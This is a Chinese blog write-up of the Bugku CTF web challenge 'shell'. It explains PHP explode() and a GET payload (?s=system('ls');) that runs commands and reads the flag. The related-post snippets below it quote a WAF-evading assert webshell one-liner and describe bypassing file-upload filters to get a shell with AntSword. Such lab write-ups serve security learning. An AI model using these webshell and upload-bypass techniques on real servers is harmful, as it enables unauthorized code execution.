bugku——文件上传——web——shell

已于 2024-05-04 21:29:24 修改
阅读量361 收藏 4
点赞数 11
文章标签: php web安全
于 2024-05-04 21:28:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75007575/article/details/138450755
版权
本文介绍了PHPexplode函数的基本用法,包括分割字符串、数组元素个数控制,并通过示例展示了如何构造payload,用于执行系统命令获取flag文件内容,强调了函数在安全编码中的注意事项。
摘要由CSDN通过智能技术生成

一、题目

explode() 函数使用一个字符串分割另一个字符串,并返回由字符串组成的数组。

  1. explode(separator,string,limit)

separator:在哪里分割字符串

string:要分割的字符串

limit:规定数组元素的个数

  • 大于 0 - 返回包含最多 limit 个元素的数组
  • 小于 0 - 返回包含除了最后的 -limit 个元素以外的所有元素的数组
  • 0 - 会被当做 1, 返回包含一个元素的数组
  • explore运行结果

  • 如果没有limit限制,则运行结果为

二、分析题目

  • $poc_1=

array(

[0] =>a $poc_1[0]

[1] =>s $poc_1[1]

[2] =>s $poc_1[2]

[3] =>e $poc_1[3]

[4] =>r $poc_1[4]

[5] =>t $poc_1[5]

);

  •   $poc_2=assert;
  • 用get方法获得传递的s的参数的值;

三、payload

  • ?s=system('ls');

  • 然后再用cat查看flag文件的内容

BYyyyy。
关注
基于Python和Shell的文件元数据与流式传输设计源码——libCharon
09-30
该项目是利用Python和Shell脚本编写的文件元数据与流式传输库源码,总计包含72个文件,涵盖27个Python脚本、17个Shell脚本、4个Markdown文档、4个配置文件、3个文本文件、2个PlantUML图和PNG图片、2个OPC文件,以及...
BugKu_文件上传
Kobalos的博客
09-16 706
直接访问目标地址,发现他给了一个上传点 看到他的提示让上传一个图片,不能上传php,那就先上传一个正常图片看看是什么样子的 可以看到上传成功后是直接给出上传后的地址的,并且还给出了超链接,那么来尝试一下上传木马 直接爆破后缀,失败,尝试绕过限制 讲请求包中的Content-Type: multipart/form-data,修改成Content-Type: Multipart/form-data(将m大写),再次爆破后缀名,发现php4上传成功了 掏出蚁剑尝试连接shell 成功getshel.
BugKu-Web-Flask_FileUpload(模板注入与文件上传
m0_73734159的博客
12-13 926
Flask也被称为“microframework”,因为它使用简单的核心,用扩展来增加其他功能。Flask的核心组件包括Werkzeug,一个WSGI工具箱,以及Jinja2,一个模板引擎。这为开发人员提供了更大的灵活性,可以根据应用程序的需求选择最适合的组件。在开发Web应用程序时,Flask提供了一个构建块,允许开发人员根据需要自由地选择和组合不同的组件。总的来说,Flask是一个轻量级的Web应用框架,具有简单性和灵活性,适合小型团队在短时间内实现功能丰富的中小型网站或Web服务。
bugku-web-文件上传-个人笔记
sunquan705的博客
11-10 706
bugku-web-文件上传-个人笔记
bugku-web-文件上传
m0_57954651的博客
11-02 2032
不可以上传 php文件 说明一共存在三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type
bugku 文件上传
m0_73721944的博客
11-26 482
(依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写))分别将后缀名修改为php2, php3, php4, php5, phps, pht, phtm, phtml(php的别名),发现只有php4没有被过滤。第二个是文件的的Content-Type: application/octet-stream,改成image/jpeg。只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件。Multipart里的部分字母改成大写的。第三个是文件后缀名改成php4。
bugku web
ershuiyan的博客
11-18 728
Simple_SSTI_1传参找flag
Linux Shell——循环与结构化命令
01-20
在Linux Shell脚本编程中,循环与结构化命令是实现自动化任务和流程控制的重要组成部分。以下将详细讲解几种常见的循环类型及其用法。 1. **for循环** - **基于列表的for循环**:通常用于遍历一个列表或一系列值。...
Linux系统学习——Shell基础
01-09
一、shell概述 shell是一个命令行解释器,为用户提供了一个向Linux内核发送请求以便运行程序的界面系统级程序。还是一个功能强大的编程语言,是解释执行的脚本语言,在Shell中可以直接调用Linux系统命令。 shell的...
文件上传bugku
ndjnddjxn的博客
04-19 691
Flask是一个较小的Python web框架,只提供了一个强劲的核心,其他的功能都需要使用拓展来实现。意味着可以根据自己的需求量身打造,一般来说就是利用它来搭建网站。Flask的核心组件包括Werkzeug,一个WSGI工具箱,以及Jinja2,一个模板引擎。Flask使用BSD授权,这意味着它遵循开源许可证,允许用户自由地使用、修改和分发分析:首先对于这个有flask构建的web文件上传程序,其中包含了一个文件上传的端点 /uploader。
BUGKU--POST上传
m0_65766842的博客
03-01 266
1
bugku——Flask_FileUpload
yc20030119的博客
08-21 810
照例先检查一下源代码(显示文件只能通过jpg或者png进行上传,并且是用python进行返回)那条件都了解了,接下来就是写对应的文件了(我用笔记本写的相对应的文件)第一个文件上传结果为目录(惊奇的发现里面有flag文件)然后将文件的后缀名改成png结尾的文件。第二个文件(text1)然后将两个文件分别上传。第一个文件(text)
Bugku CTF Web Flask_FileUpload
网安小趴菜
10-20 1022
Bugku CTF Web Flask_FileUpload
Bugku---web---shell
最新发布
weixin_47450099的博客
05-27 757
system函数,whoami命令的使用,可以直接查看当前登录系统的用户名等
Bugku WEB shell
qq_41696858的博客
07-03 2145
1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’]) 很明显assert是能执行shell命令的危险
BUGKU-WEB shell
天泽岁月
03-14 967
BUGKU-WEB shellPHP explode函数和assert函数理解
bugku文件包含2
09-25
文件包含是指通过一个文件传入参数(构造语句)去访问另一个文件,从而获取想要的内容。在bugku中,文件包含的方法主要有两种。 首先,可以通过上传文件并抓包的方式来实现文件包含。通过修改参数content-type为image/jpeg filename="1.php:.jpg",可以获取到文件路径。 然后,访问返回的路径,可以看到一串字符,其中包含了一个.txt文件。通过修改参数file=.txt,即可获取到Flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值